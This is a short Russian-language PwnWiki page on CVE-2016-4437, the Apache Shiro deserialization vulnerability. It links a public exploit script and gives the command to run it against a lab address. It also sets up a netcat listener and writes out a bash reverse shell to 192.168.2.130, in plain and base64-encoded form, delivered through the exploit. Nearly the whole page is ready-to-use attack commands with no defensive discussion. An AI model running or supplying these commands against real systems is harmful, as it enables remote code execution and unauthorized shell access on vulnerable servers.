CVE-2016-4437 Десериализация Широ Уязвимость

From PwnWiki
Revision as of 15:42, 20 April 2021 by Pwnwiki (talk | contribs) (Created page with "Машина-жертва выполняет следующую команду:")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Bahasa Indonesia • ‎Chinese • ‎русский • ‎中文(简体)‎

POC

https://github.com/insightglacier/Shiro_exploit


Эксплуатация уязвимостей

python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "touch a.txt"

Команда была выполнена успешно.

Getshell

Слушатель выполняет следующие команды: 

nc -lvp 666

Машина-жертва выполняет следующую команду: 

bash -i >& /dev/tcp/192.168.2.130/6666 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}



python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}"
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2016-4437_Shiro反序列化漏洞/ru&oldid=1796"